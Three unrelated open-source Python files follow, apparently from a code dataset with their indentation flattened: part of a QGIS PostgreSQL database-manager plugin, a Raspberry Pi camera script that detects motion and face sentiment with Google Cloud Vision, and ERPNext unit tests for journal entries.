r = connector._execute(None, "SELECT current_database()")
dbname = (u'dbname=\'%s\'' % connector._fetchone(r)[0])
connector._close_cursor(r)
# Find first raster field
col = ''
for fld in self.fields():
if fld.dataType == "raster":
col = u'column=\'%s\'' % fld.name
break
uri = u'%s %s %s %s %s %s %s table=%s' % \
(service, dbname, host, user, passw, port, col, table)
return uri
def mimeUri(self):
uri = u"raster:postgresraster:{}:{}".format(self.name, re.sub(":", r"\:", self.uri()))
return uri
def toMapLayer(self):
from qgis.core import QgsRasterLayer, QgsContrastEnhancement, QgsDataSourceUri, QgsCredentials
rl = QgsRasterLayer(self.uri(), self.name, "postgresraster")
if not rl.isValid():
err = rl.error().summary()
uri = QgsDataSourceUri(self.database().uri())
conninfo = uri.connectionInfo(False)
username = uri.username()
password = uri.password()
for i in range(3):
(ok, username, password) = QgsCredentials.instance().get(conninfo, username, password, err)
if ok:
uri.setUsername(username)
uri.setPassword(password)
rl = QgsRasterLayer(self.uri(uri), self.name)
if rl.isValid():
break
if rl.isValid():
rl.setContrastEnhancement(QgsContrastEnhancement.StretchToMinimumMaximum)
return rl
class PGTableField(TableField):
def __init__(self, row, table):
TableField.__init__(self, table)
self.num, self.name, self.dataType, self.charMaxLen, self.modifier, self.notNull, self.hasDefault, self.default, typeStr = row
self.primaryKey = False
# get modifier (e.g. "precision,scale") from formatted type string
trimmedTypeStr = typeStr.strip()
regex = QRegExp("\\((.+)\\)$")
startpos = regex.indexIn(trimmedTypeStr)
if startpos >= 0:
self.modifier = regex.cap(1).strip()
else:
self.modifier = None
# find out whether fields are part of primary key
for con in self.table().constraints():
if con.type == TableConstraint.TypePrimaryKey and self.num in con.columns:
self.primaryKey = True
break
def getComment(self):
"""Returns the comment for a field"""
tab = self.table()
# SQL Query checking if a comment exists for the field
sql_cpt = "Select count(*) from pg_description pd, pg_class pc, pg_attribute pa where relname = '%s' and attname = '%s' and pa.attrelid = pc.oid and pd.objoid = pc.oid and pd.objsubid = pa.attnum" % (tab.name, self.name)
# SQL Query that return the comment of the field
sql = "Select pd.description from pg_description pd, pg_class pc, pg_attribute pa where relname = '%s' and attname = '%s' and pa.attrelid = pc.oid and pd.objoid = pc.oid and pd.objsubid = pa.attnum" % (tab.name, self.name)
c = tab.database().connector._execute(None, sql_cpt) # Execute Check query
res = tab.database().connector._fetchone(c)[0] # Store result
if res == 1:
# When a comment exists
c = tab.database().connector._execute(None, sql) # Execute query
res = tab.database().connector._fetchone(c)[0] # Store result
tab.database().connector._close_cursor(c) # Close cursor
return res # Return comment
else:
return ''
class PGTableConstraint(TableConstraint):
def __init__(self, row, table):
TableConstraint.__init__(self, table)
self.name, constr_type_str, self.isDefferable, self.isDeffered, columns = row[:5]
self.columns = list(map(int, columns.split(' ')))
if constr_type_str in TableConstraint.types:
self.type = TableConstraint.types[constr_type_str]
else:
self.type = TableConstraint.TypeUnknown
if self.type == TableConstraint.TypeCheck:
self.checkSource = row[5]
elif self.type == TableConstraint.TypeForeignKey:
self.foreignTable = row[6]
self.foreignOnUpdate = TableConstraint.onAction[row[7]]
self.foreignOnDelete = TableConstraint.onAction[row[8]]
self.foreignMatchType = TableConstraint.matchTypes[row[9]]
self.foreignKeys = row[10]
class PGTableIndex(TableIndex):
def __init__(self, row, table):
TableIndex.__init__(self, table)
self.name, columns, self.isUnique = row
self.columns = list(map(int, columns.split(' ')))
class PGTableTrigger(TableTrigger):
def __init__(self, row, table):
TableTrigger.__init__(self, table)
self.name, self.function, self.type, self.enabled = row
class PGTableRule(TableRule):
def __init__(self, row, table):
TableRule.__init__(self, table)
self.name, self.definition = row
| gpl-2.0 |
raygeeknyc/ohgee | visionanalyzer.py | 1 | 19670 | #!/usr/bin/python3
import logging
# Used only if this is run as main
_DEBUG = logging.DEBUG
SENTIMENT_CONFIDENCE_THRESHOLD = 0.25
GOOD_SENTIMENT_THRESHOLD = SENTIMENT_CONFIDENCE_THRESHOLD
BAD_SENTIMENT_THRESHOLD = -1*SENTIMENT_CONFIDENCE_THRESHOLD
# Import the packages we need for drawing and displaying images
from PIL import Image, ImageDraw
# Imports the Google Cloud client packages we need
from google.cloud import vision
# Enumerate the likelihood names that are defined by Cloud Vision 1
LIKELIHOOD_NAMES = {'UNKNOWN':0, 'VERY_UNLIKELY':1, 'UNLIKELY':2, 'POSSIBLE':3,
'LIKELY':4, 'VERY_LIKELY':5}
from picamera import PiCamera
import multiprocessing
from multiprocessingloghandler import ParentMultiProcessingLogHandler
from multiprocessingloghandler import ChildMultiProcessingLogHandler
from random import randint
import io
import sys
import os
import time
import signal
import queue
import threading
# This is the desired resolution of the Pi camera
RESOLUTION = (600, 400)
CAPTURE_RATE_FPS = 2
# This is over an observed covered camera's noise
TRAINING_SAMPLES = 5
# This is how much the green channel has to change to consider a pixel changed
PIXEL_SHIFT_SENSITIVITY = 30
# This is the portion of pixels to compare when detecting motion
MOTION_DETECT_SAMPLE = 1.0/20 # so... 5%? (Kudos to Sarah Cooper)
# This is how long to sleep in various threads between shutdown checks
POLL_SECS = 0.1
# This is the rate at which to send frames to the vision service
ANALYSIS_RATE_FPS = 1
_ANALYSIS_DELAY_SECS = 1.0/ANALYSIS_RATE_FPS
COLOR_MEH = (0, 0, 127)
COLOR_BAD = (200, 0, 0)
COLOR_GOOD = (0, 200, 0)
COLOR_FEATURES = (255,255,255)
def signal_handler(sig, frame):
global STOP
if STOP:
signal.signal(signal.SIGINT, signal.SIG_IGN)
os.kill(os.getpid(), signal.SIGTERM)
logging.debug("SIGINT")
STOP = True
signal.signal(signal.SIGINT, signal_handler)
EMPTY_LABELS = []
BAD_MOOD_GREETINGS = (["don't", "worry", "be", "happy"], ["I'm", "sorry", "that", "you're", "not", "feeling", "happy"], ["You", "look", "down"], ["I", "hope", "that", "I", "can", "cheer", "you", "up"], ["I", "hope", "that", "you", "feel", "better", "soon"], ["Smile!"])
GOOD_MOOD_GREETINGS = (["I'm", "glad", "that", "you", "are", "happy"], ["You", "look", "happy"], ["You", "cheer", "me", "up"], ["It's", "great", "to", "see", "you", "happy"], ["Great", "day"])
DOG_LABELS = ["dog", "canine"]
DOG_GREETINGS = (["here", "doggie"], ["hi","puppy"], ["hello", "puppy"], ["woof", "woof"], ["bark", "bark"], ["good", "puppy"], ["good", "puppy"], ["nice", "doggie"])
CAT_LABELS = ["cat", "feline"]
CAT_GREETINGS = (["meow"], ["meow", "meow"], ["nice", "kitty"], ["what", "a", "nice", "cat"])
HAT_LABELS = ["hat", "cap", "headgear"]
HAT_GREETINGS = (["that's", "a", "nice", "hat"], ["nice", "hat"], ["nice", "cap"], ["I", "like", "your", "hat"])
COFFEE_LABELS = ["espresso", "cup", "mug", "coffee", "coffee cup", "drinkware"]
COFFEE_GREETINGS = (["is", "that", "a", "cup", "of", "good", "coffee"], ["I", "love", "coffee", "too"], ["I", "hope", "that", "you", "enjoy", "your", "coffee"])
EYEGLASS_LABELS = ["glasses", "eyewear"]
EYEGLASS_GREETINGS = (["those", "are", "nice", "eye", "glasses"], ["I", "like", "your", "glasses"], ["nice", "glasses"], ["nice", "eye", "glasses"], [], [], [], [])
FLOWER_LABELS = ["flowers", "flower", "floral"]
FLOWER_GREETINGS = (["what", "a", "pretty", "flower"], ["nice", "flowers"], [])
# Only the first label found in tags will be used, so prioritize them in this list
LABELS_GREETINGS = [(DOG_LABELS, DOG_GREETINGS, EMPTY_LABELS, True),
(CAT_LABELS, CAT_GREETINGS, EMPTY_LABELS, False),
(HAT_LABELS, HAT_GREETINGS, EMPTY_LABELS, False),
(FLOWER_LABELS, FLOWER_GREETINGS, EMPTY_LABELS, False),
(COFFEE_LABELS, COFFEE_GREETINGS, EMPTY_LABELS, False),
(EYEGLASS_LABELS, EYEGLASS_GREETINGS, EMPTY_LABELS, False)]
def randomGreetingFrom(phrases):
if not phrases: return []
return phrases[randint(0,len(phrases)-1)]
def getBadMoodGreeting():
return (randomGreetingFrom(BAD_MOOD_GREETINGS), False)
def getGoodMoodGreeting():
return (randomGreetingFrom(GOOD_MOOD_GREETINGS), False)
# Return (greeting, wave_flag, primary tag) for the first label set that
# matches one of the supplied labels and has no match in its excludes list
def getGreetingForLabels(labels):
for tags, greetings, excludes, wave_flag in LABELS_GREETINGS:
for label in labels:
logging.debug("label: {}".format(label))
matched_label_text = labelMatch(labels, tags)
if matched_label_text:
matched_exclude = labelMatch(labels, excludes)
if not matched_exclude:
return (randomGreetingFrom(greetings), wave_flag, tags[0])
return None
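# Illustrative example (assumed labels, mirroring LABELS_GREETINGS above):
#   getGreetingForLabels(["dog", "grass"]) could return something like
#   (["woof", "woof"], True, "dog") -- a random DOG greeting, the wave flag,
#   and the first tag of the matched label set.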
def labelMatch(labels,tags):
for candidate_label in labels:
if candidate_label in tags:
return candidate_label
return None
# Sentiment is -1, 0 or +1 for this sentiment and level
# -1 == bad, 0 == meh, +1 == good
def getSentimentForLevel(face, level):
if face.joy_likelihood == level or face.surprise_likelihood == level:
logging.debug("getSentimentForLevel: %s joy: %s surprise: %s" % (str(level), str(face.joy_likelihood), str(face.surprise_likelihood)))
return 1.0
if face.anger_likelihood == level or face.sorrow_likelihood == level:
logging.debug("getSentimentForLevel: %s anger: %s sorrow: %s" % (str(level), str(face.anger_likelihood), str(face.sorrow_likelihood)))
return -1.0
return 0.0
def getSentimentWeightedByLevel(face):
logging.debug("joy: {}, surprise:{}, anger:{}, sorrow:{}".format(
face.joy_likelihood, face.surprise_likelihood, face.anger_likelihood, face.sorrow_likelihood))
sentiment = getSentimentForLevel(face, LIKELIHOOD_NAMES['VERY_LIKELY'])
if sentiment != 0:
return sentiment
sentiment = getSentimentForLevel(face, LIKELIHOOD_NAMES['LIKELY'])
if sentiment != 0:
return sentiment * SENTIMENT_CONFIDENCE_THRESHOLD
sentiment = getSentimentForLevel(face, LIKELIHOOD_NAMES['POSSIBLE'])
if sentiment != 0:
return sentiment * SENTIMENT_CONFIDENCE_THRESHOLD
sentiment = getSentimentForLevel(face, LIKELIHOOD_NAMES['UNLIKELY'])
if sentiment != 0:
return sentiment * 0.25
return 0.0
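# Summary of the weighting above (descriptive only):
#   VERY_LIKELY joy/surprise -> +1.0, VERY_LIKELY anger/sorrow -> -1.0
#   LIKELY or POSSIBLE -> the same sign scaled by SENTIMENT_CONFIDENCE_THRESHOLD
#   UNLIKELY -> the same sign scaled by 0.25, otherwise 0.0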
class ImageAnalyzer(multiprocessing.Process):
def __init__(self, vision_queue, log_queue, logging_level):
multiprocessing.Process.__init__(self)
self._log_queue = log_queue
self._logging_level = logging_level
self._exit = multiprocessing.Event()
self._vision_queue, _ = vision_queue
self._stop_capturing = False
self._stop_analyzing = False
self._last_frame_at = 0.0
self._frame_delay_secs = 1.0/CAPTURE_RATE_FPS
def stop(self):
logging.debug("***analysis received shutdown")
self._exit.set()
def _initLogging(self):
handler = ChildMultiProcessingLogHandler(self._log_queue)
logging.getLogger(str(os.getpid())).addHandler(handler)
logging.getLogger(str(os.getpid())).setLevel(self._logging_level)
def capturePilFrame(self):
s=time.time()
self._image_buffer.seek(0)
self._camera.capture(self._image_buffer, format="jpeg", use_video_port=True)
self._image_buffer.seek(0)
image = Image.open(self._image_buffer)
image_pixels = image.load()
image = self._image_buffer.getvalue()
self._last_frame_at = time.time()
logging.debug("capturePilFrame took {}".format(time.time()-s))
return (image, image_pixels)
def getNextFrame(self):
delay = (self._last_frame_at + self._frame_delay_secs) - time.time()
if delay > 0:
time.sleep(delay)
self._current_frame = self.capturePilFrame()
def calculateImageDifference(self, change_threshold=None, sample_percentage=MOTION_DETECT_SAMPLE):
"""
Detect changes in the green channel.
Sample sample_percentage of pixels, evenly distributed throughout
the image's pixel map.
If change_threshold is specified, exit once it's reached.
"""
s = time.time()
changed_pixels = 0
sample_size = sample_percentage * self._camera.resolution[0] * self._camera.resolution[1]
step_size = self._camera.resolution[0] * self._camera.resolution[1] / sample_size
# We choose the "most square" sampling interval to avoid sampling one or few stripes
if self._camera.resolution[0] < self._camera.resolution[1]:
y_step = int(sample_size / self._camera.resolution[0])
x_step = 1
else:
x_step = int(sample_size / self._camera.resolution[0])
y_step = 1
logging.debug("Motion threshold, pct, size, step_size, x_step, y_step: {},{},{},{},{},{}".format(change_threshold, sample_percentage, sample_size, step_size, x_step, y_step))
samples = 0
for x in range(0, self._camera.resolution[0], x_step):
for y in range(0, self._camera.resolution[1], y_step):
samples += 1
if abs(self._current_frame[1][x,y][1] - self._prev_frame[1][x,y][1]) > PIXEL_SHIFT_SENSITIVITY:
changed_pixels += 1
if change_threshold and changed_pixels > change_threshold:
logging.debug("reached threshold: {}, {} secs".format(changed_pixels, time.time()-s))
return changed_pixels
logging.debug("calculated change: {}, {} secs".format(changed_pixels, time.time()-s))
return changed_pixels
def imageDifferenceOverThreshold(self, changed_pixels_threshold):
"Are there more changed pixels than we've established as a lower bound for motion?"
changed_pixels = self.calculateImageDifference(changed_pixels_threshold)
return changed_pixels > changed_pixels_threshold
def trainMotion(self):
logging.debug("Training motion")
trained = False
try:
self._camera.start_preview(fullscreen=False, window=(100,100,self._camera.resolution[0], self._camera.resolution[1]))
self._motion_threshold = 9999
self.getNextFrame()
for i in range(TRAINING_SAMPLES):
self._prev_frame = self._current_frame
self.getNextFrame()
motion = self.calculateImageDifference()
self._motion_threshold = min(motion, self._motion_threshold)
trained = True
finally:
self._camera.stop_preview()
logging.debug("Trained {}".format(trained))
return trained
def run(self):
self._initLogging()
try:
self._frames = queue.Queue()
self._stop_capturing = False
self._stop_analyzing = False
self._capturer = threading.Thread(target=self.captureFrames)
self._capturer.start()
self._analyzer = threading.Thread(target=self.analyzeVision)
self._analyzer.start()
while not self._exit.is_set():
time.sleep(POLL_SECS)
logging.debug("Shutting down threads")
self._stop_capturing = True
self._capturer.join()
self._stop_analyzing = True
self._analyzer.join()
except Exception:
logging.exception("Error in vision main thread")
finally:
logging.debug("Exiting vision")
sys.exit(0)
def analyzeVision(self):
self._vision_client = vision.ImageAnnotatorClient()
skipped_images = 0
frame = None
while not self._stop_analyzing:
try:
frame = self._frames.get(block=False)
skipped_images += 1
except queue.Empty:
if not frame:
logging.debug("Empty image queue, waiting")
skipped_images = 0
time.sleep(POLL_SECS)
else:
skipped_images -= 1
logging.debug("Trailing frame read, skipped {} frames".format(skipped_images))
try:
results = self._analyzeFrame(frame)
buffer = io.BytesIO()
results[0].save(buffer, format="JPEG")
buffer.seek(0)
img_bytes = buffer.getvalue()
logging.debug("send image %s" % type(img_bytes))
self._vision_queue.send((img_bytes, results[1], results[2], results[3], results[4]))
except Exception:
logging.exception("error reading image")
finally:
frame = None
self._vision_queue.close()
logging.debug("Exiting vision analyze thread")
def _analyzeFrame(self, frame):
s=time.time()
logging.debug("analyzing image")
remote_image = vision.Image(content=frame[0])
labels = self._vision_client.label_detection(image=remote_image).label_annotations
faces = self._vision_client.face_detection(image=remote_image, image_context=None,
max_results=2).face_annotations
faces_details = findFacesDetails(faces)
im = Image.open(io.BytesIO(frame[0]))
size = im.size[0] * im.size[1]
canvas = ImageDraw.Draw(im)
obscureFacesWithSentiments(canvas, faces_details)
strongest_sentiment = 0.0
max_confidence = 0.0
max_area = 0.0
for face_detail in faces_details:
if face_detail[3] > max_area:
max_area = face_detail[3]
if face_detail[2] > max_confidence:
max_confidence = face_detail[2]
strongest_sentiment = face_detail[0]
logging.debug("sentiment:{}".format(strongest_sentiment))
logging.debug("_analyzeFrame took {}".format(time.time()-s))
max_area_portion = (max_area * 1.0) / size
label_descriptions = [label.description for label in labels]
return (im, label_descriptions, faces_details, strongest_sentiment, max_area_portion)
def captureFrames(self):
self._image_buffer = io.BytesIO()
self._camera = PiCamera()
self._camera.resolution = RESOLUTION
self._camera.vflip = True
prev_array = None
logging.info("Training motion detection")
for retry in range(3):
if self.trainMotion():
break
logging.info("Trained motion detection {}".format(self._motion_threshold))
while not self._stop_capturing:
try:
self.getNextFrame()
if self.imageDifferenceOverThreshold(self._motion_threshold):
logging.debug("Motion detected")
self._frames.put(self._current_frame)
self._prev_frame = self._current_frame
self.getNextFrame()
except Exception as e:
logging.error("Error in analysis: {}".format(e))
logging.debug("Exiting vision capture thread")
self._camera.close()
def findFacesDetails(faces):
faces_details = []
if faces:
for face in faces:
top = 9999
left = 9999
bottom = 0
right = 0
for point in face.bounding_poly.vertices:
top = min(top, point.y)
left = min(left, point.x)
bottom = max(bottom, point.y)
right = max(right, point.x)
sentiment = getSentimentWeightedByLevel(face)
area = abs(bottom - top) * abs(right - left)
faces_details.append((sentiment, ((left, top), (right, bottom)), face.detection_confidence, area))
return faces_details
def getColorForSentiment(sentiment):
if sentiment < 0:
return COLOR_BAD
if sentiment > 0:
return COLOR_GOOD
return COLOR_MEH
def watchForResults(vision_results_queue):
global STOP
_, incoming_results = vision_results_queue
try:
while True:
image, labels, faces_details, sentiment, max_area_portion = incoming_results.recv()
logging.debug("{} faces detected".format(len(faces_details)))
for label in labels:
logging.debug("label: {}".format(label))
except EOFError:
logging.debug("Done watching")
def obscureFacesWithSentiments(canvas, faces_details):
for face_sentiment, face_boundary, _, _ in faces_details:
sentiment_color = getColorForSentiment(face_sentiment)
canvas.ellipse(face_boundary, fill=sentiment_color, outline=None)
eye_size = max(1, (face_boundary[1][0] - face_boundary[0][0]) / 50)
nose_size = 2*eye_size
eye_level = face_boundary[0][1] + (face_boundary[1][1] - face_boundary[0][1])/3.0
nose_level = face_boundary[0][1] + (face_boundary[1][1] - face_boundary[0][1])/2.0
mouth_size_h = (face_boundary[1][0] - face_boundary[0][0])/2.0
mouth_size_v = (face_boundary[1][1] - nose_level)/2.0
mouth_size = min(mouth_size_v, mouth_size_h)
mouth_inset = ((face_boundary[1][0]-face_boundary[0][0])-mouth_size)/2
canvas.ellipse((face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/3.0)-eye_size, eye_level-eye_size, face_boundary[0][0]+((face_boundary[1][0]-face_boundary[0][0])/3.0)+eye_size, eye_level + eye_size), None, outline=COLOR_FEATURES)
canvas.ellipse((face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/3.0)*2-eye_size, eye_level-eye_size, face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/3.0)*2+eye_size, eye_level+eye_size), None, outline=COLOR_FEATURES)
canvas.ellipse((face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/2.0)-nose_size, nose_level-nose_size, face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/2.0)+nose_size, nose_level+nose_size), outline=COLOR_FEATURES, fill=COLOR_FEATURES)
if sentiment_color == COLOR_GOOD:
canvas.chord(( face_boundary[0][0]+mouth_inset, nose_level, face_boundary[0][0]+mouth_inset+mouth_size, nose_level+mouth_size), 35, 135, fill=COLOR_FEATURES, outline=COLOR_FEATURES)
elif sentiment_color == COLOR_BAD:
canvas.chord(( face_boundary[0][0]+mouth_inset, face_boundary[1][1]-(face_boundary[1][1]-nose_level)*0.67, face_boundary[0][0]+mouth_inset+mouth_size, face_boundary[1][1]), 215, 335, fill=COLOR_FEATURES, outline=COLOR_FEATURES)
if __name__ == '__main__':
global STOP
STOP = False
log_stream = sys.stderr
log_queue = multiprocessing.Queue(100)
handler = ParentMultiProcessingLogHandler(logging.StreamHandler(log_stream), log_queue)
logging.getLogger('').addHandler(handler)
logging.getLogger('').setLevel(_DEBUG)
vision_results_queue = multiprocessing.Pipe()
vision_worker = ImageAnalyzer(vision_results_queue, log_queue, logging.getLogger('').getEffectiveLevel())
try:
logging.debug("Starting image analysis")
vision_worker.start()
unused, _ = vision_results_queue
unused.close()
watcher = threading.Thread(target = watchForResults, args=(vision_results_queue,))
watcher.start()
while not STOP:
time.sleep(POLL_SECS)
except Exception:
logging.exception("Main exception")
finally:
logging.debug("Ending")
vision_worker.stop()
vision_worker.join()
logging.debug("background process returned, exiting main process")
sys.exit(0)
| gpl-3.0 |
neilLasrado/erpnext | erpnext/accounts/doctype/journal_entry/test_journal_entry.py | 14 | 11145 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest, frappe
from frappe.utils import flt, nowdate
from erpnext.accounts.doctype.account.test_account import get_inventory_account
from erpnext.exceptions import InvalidAccountCurrency
class TestJournalEntry(unittest.TestCase):
def test_journal_entry_with_against_jv(self):
jv_invoice = frappe.copy_doc(test_records[2])
base_jv = frappe.copy_doc(test_records[0])
self.jv_against_voucher_testcase(base_jv, jv_invoice)
def test_jv_against_sales_order(self):
from erpnext.selling.doctype.sales_order.test_sales_order import make_sales_order
sales_order = make_sales_order(do_not_save=True)
base_jv = frappe.copy_doc(test_records[0])
self.jv_against_voucher_testcase(base_jv, sales_order)
def test_jv_against_purchase_order(self):
from erpnext.buying.doctype.purchase_order.test_purchase_order import create_purchase_order
purchase_order = create_purchase_order(do_not_save=True)
base_jv = frappe.copy_doc(test_records[1])
self.jv_against_voucher_testcase(base_jv, purchase_order)
def jv_against_voucher_testcase(self, base_jv, test_voucher):
dr_or_cr = "credit" if test_voucher.doctype in ["Sales Order", "Journal Entry"] else "debit"
test_voucher.insert()
test_voucher.submit()
if test_voucher.doctype == "Journal Entry":
self.assertTrue(frappe.db.sql("""select name from `tabJournal Entry Account`
where account = %s and docstatus = 1 and parent = %s""",
("_Test Receivable - _TC", test_voucher.name)))
self.assertFalse(frappe.db.sql("""select name from `tabJournal Entry Account`
where reference_type = %s and reference_name = %s""", (test_voucher.doctype, test_voucher.name)))
base_jv.get("accounts")[0].is_advance = "Yes" if (test_voucher.doctype in ["Sales Order", "Purchase Order"]) else "No"
base_jv.get("accounts")[0].set("reference_type", test_voucher.doctype)
base_jv.get("accounts")[0].set("reference_name", test_voucher.name)
base_jv.insert()
base_jv.submit()
submitted_voucher = frappe.get_doc(test_voucher.doctype, test_voucher.name)
self.assertTrue(frappe.db.sql("""select name from `tabJournal Entry Account`
where reference_type = %s and reference_name = %s and {0}=400""".format(dr_or_cr),
(submitted_voucher.doctype, submitted_voucher.name)))
if base_jv.get("accounts")[0].is_advance == "Yes":
self.advance_paid_testcase(base_jv, submitted_voucher, dr_or_cr)
self.cancel_against_voucher_testcase(submitted_voucher)
def advance_paid_testcase(self, base_jv, test_voucher, dr_or_cr):
#Test advance paid field
advance_paid = frappe.db.sql("""select advance_paid from `tab%s`
where name=%s""" % (test_voucher.doctype, '%s'), (test_voucher.name))
payment_against_order = base_jv.get("accounts")[0].get(dr_or_cr)
self.assertTrue(flt(advance_paid[0][0]) == flt(payment_against_order))
def cancel_against_voucher_testcase(self, test_voucher):
if test_voucher.doctype == "Journal Entry":
# if test_voucher is a Journal Entry, test cancellation of test_voucher
test_voucher.cancel()
self.assertFalse(frappe.db.sql("""select name from `tabJournal Entry Account`
where reference_type='Journal Entry' and reference_name=%s""", test_voucher.name))
elif test_voucher.doctype in ["Sales Order", "Purchase Order"]:
# if test_voucher is a Sales Order/Purchase Order, test error on cancellation of test_voucher
submitted_voucher = frappe.get_doc(test_voucher.doctype, test_voucher.name)
self.assertRaises(frappe.LinkExistsError, submitted_voucher.cancel)
def test_jv_against_stock_account(self):
from erpnext.stock.doctype.purchase_receipt.test_purchase_receipt import set_perpetual_inventory
set_perpetual_inventory()
jv = frappe.copy_doc(test_records[0])
jv.get("accounts")[0].update({
"account": get_inventory_account('_Test Company'),
"company": "_Test Company",
"party_type": None,
"party": None
})
jv.insert()
from erpnext.accounts.general_ledger import StockAccountInvalidTransaction
self.assertRaises(StockAccountInvalidTransaction, jv.submit)
set_perpetual_inventory(0)
def test_multi_currency(self):
jv = make_journal_entry("_Test Bank USD - _TC",
"_Test Bank - _TC", 100, exchange_rate=50, save=False)
jv.get("accounts")[1].credit_in_account_currency = 5000
jv.submit()
gl_entries = frappe.db.sql("""select account, account_currency, debit, credit,
debit_in_account_currency, credit_in_account_currency
from `tabGL Entry` where voucher_type='Journal Entry' and voucher_no=%s
order by account asc""", jv.name, as_dict=1)
self.assertTrue(gl_entries)
expected_values = {
"_Test Bank USD - _TC": {
"account_currency": "USD",
"debit": 5000,
"debit_in_account_currency": 100,
"credit": 0,
"credit_in_account_currency": 0
},
"_Test Bank - _TC": {
"account_currency": "INR",
"debit": 0,
"debit_in_account_currency": 0,
"credit": 5000,
"credit_in_account_currency": 5000
}
}
for field in ("account_currency", "debit", "debit_in_account_currency", "credit", "credit_in_account_currency"):
for i, gle in enumerate(gl_entries):
self.assertEqual(expected_values[gle.account][field], gle[field])
# cancel
jv.cancel()
gle = frappe.db.sql("""select name from `tabGL Entry`
where voucher_type='Sales Invoice' and voucher_no=%s""", jv.name)
self.assertFalse(gle)
def test_disallow_change_in_account_currency_for_a_party(self):
# create jv in USD
jv = make_journal_entry("_Test Bank USD - _TC",
"_Test Receivable USD - _TC", 100, save=False)
jv.accounts[1].update({
"party_type": "Customer",
"party": "_Test Customer USD"
})
jv.submit()
# create jv in USD, but account currency in INR
jv = make_journal_entry("_Test Bank - _TC",
"_Test Receivable - _TC", 100, save=False)
jv.accounts[1].update({
"party_type": "Customer",
"party": "_Test Customer USD"
})
self.assertRaises(InvalidAccountCurrency, jv.submit)
# back in USD
jv = make_journal_entry("_Test Bank USD - _TC",
"_Test Receivable USD - _TC", 100, save=False)
jv.accounts[1].update({
"party_type": "Customer",
"party": "_Test Customer USD"
})
jv.submit()
def test_inter_company_jv(self):
frappe.db.set_value("Account", "Sales Expenses - _TC", "inter_company_account", 1)
frappe.db.set_value("Account", "Buildings - _TC", "inter_company_account", 1)
frappe.db.set_value("Account", "Sales Expenses - _TC1", "inter_company_account", 1)
frappe.db.set_value("Account", "Buildings - _TC1", "inter_company_account", 1)
jv = make_journal_entry("Sales Expenses - _TC", "Buildings - _TC", 100, posting_date=nowdate(), cost_center = "Main - _TC", save=False)
jv.voucher_type = "Inter Company Journal Entry"
jv.multi_currency = 0
jv.insert()
jv.submit()
jv1 = make_journal_entry("Sales Expenses - _TC1", "Buildings - _TC1", 100, posting_date=nowdate(), cost_center = "Main - _TC1", save=False)
jv1.inter_company_journal_entry_reference = jv.name
jv1.company = "_Test Company 1"
jv1.voucher_type = "Inter Company Journal Entry"
jv1.multi_currency = 0
jv1.insert()
jv1.submit()
jv.reload()
self.assertEqual(jv.inter_company_journal_entry_reference, jv1.name)
self.assertEqual(jv1.inter_company_journal_entry_reference, jv.name)
jv.cancel()
jv1.reload()
jv.reload()
self.assertEqual(jv.inter_company_journal_entry_reference, "")
self.assertEqual(jv1.inter_company_journal_entry_reference, "")
def test_jv_for_enable_allow_cost_center_in_entry_of_bs_account(self):
from erpnext.accounts.doctype.cost_center.test_cost_center import create_cost_center
accounts_settings = frappe.get_doc('Accounts Settings', 'Accounts Settings')
accounts_settings.allow_cost_center_in_entry_of_bs_account = 1
accounts_settings.save()
cost_center = "_Test Cost Center for BS Account - _TC"
create_cost_center(cost_center_name="_Test Cost Center for BS Account", company="_Test Company")
jv = make_journal_entry("_Test Cash - _TC", "_Test Bank - _TC", 100, cost_center = cost_center, save=False)
jv.voucher_type = "Bank Entry"
jv.multi_currency = 0
jv.cheque_no = "112233"
jv.cheque_date = nowdate()
jv.insert()
jv.submit()
expected_values = {
"_Test Cash - _TC": {
"cost_center": cost_center
},
"_Test Bank - _TC": {
"cost_center": cost_center
}
}
gl_entries = frappe.db.sql("""select account, cost_center, debit, credit
from `tabGL Entry` where voucher_type='Journal Entry' and voucher_no=%s
order by account asc""", jv.name, as_dict=1)
self.assertTrue(gl_entries)
for gle in gl_entries:
self.assertEqual(expected_values[gle.account]["cost_center"], gle.cost_center)
accounts_settings.allow_cost_center_in_entry_of_bs_account = 0
accounts_settings.save()
def test_jv_account_and_party_balance_for_enable_allow_cost_center_in_entry_of_bs_account(self):
from erpnext.accounts.doctype.cost_center.test_cost_center import create_cost_center
from erpnext.accounts.utils import get_balance_on
accounts_settings = frappe.get_doc('Accounts Settings', 'Accounts Settings')
accounts_settings.allow_cost_center_in_entry_of_bs_account = 1
accounts_settings.save()
cost_center = "_Test Cost Center for BS Account - _TC"
create_cost_center(cost_center_name="_Test Cost Center for BS Account", company="_Test Company")
jv = make_journal_entry("_Test Cash - _TC", "_Test Bank - _TC", 100, cost_center = cost_center, save=False)
account_balance = get_balance_on(account="_Test Bank - _TC", cost_center=cost_center)
jv.voucher_type = "Bank Entry"
jv.multi_currency = 0
jv.cheque_no = "112233"
jv.cheque_date = nowdate()
jv.insert()
jv.submit()
expected_account_balance = account_balance - 100
account_balance = get_balance_on(account="_Test Bank - _TC", cost_center=cost_center)
self.assertEqual(expected_account_balance, account_balance)
accounts_settings.allow_cost_center_in_entry_of_bs_account = 0
accounts_settings.save()
def make_journal_entry(account1, account2, amount, cost_center=None, posting_date=None, exchange_rate=1, save=True, submit=False, project=None):
if not cost_center:
cost_center = "_Test Cost Center - _TC"
jv = frappe.new_doc("Journal Entry")
jv.posting_date = posting_date or nowdate()
jv.company = "_Test Company"
jv.user_remark = "test"
jv.multi_currency = 1
jv.set("accounts", [
{
"account": account1,
"cost_center": cost_center,
"project": project,
"debit_in_account_currency": amount if amount > 0 else 0,
"credit_in_account_currency": abs(amount) if amount < 0 else 0,
"exchange_rate": exchange_rate
}, {
"account": account2,
"cost_center": cost_center,
"project": project,
"credit_in_account_currency": amount if amount > 0 else 0,
"debit_in_account_currency": abs(amount) if amount < 0 else 0,
"exchange_rate": exchange_rate
}
])
if save or submit:
jv.insert()
if submit:
jv.submit()
return jv
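# Illustrative usage (a sketch based on the calls in the tests above):
#   jv = make_journal_entry("_Test Cash - _TC", "_Test Bank - _TC", 100,
#       cost_center="_Test Cost Center - _TC", submit=True)
#   # creates and submits a two-leg Journal Entry that debits account1 and
#   # credits account2 by the given amount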
test_records = frappe.get_test_records('Journal Entry')
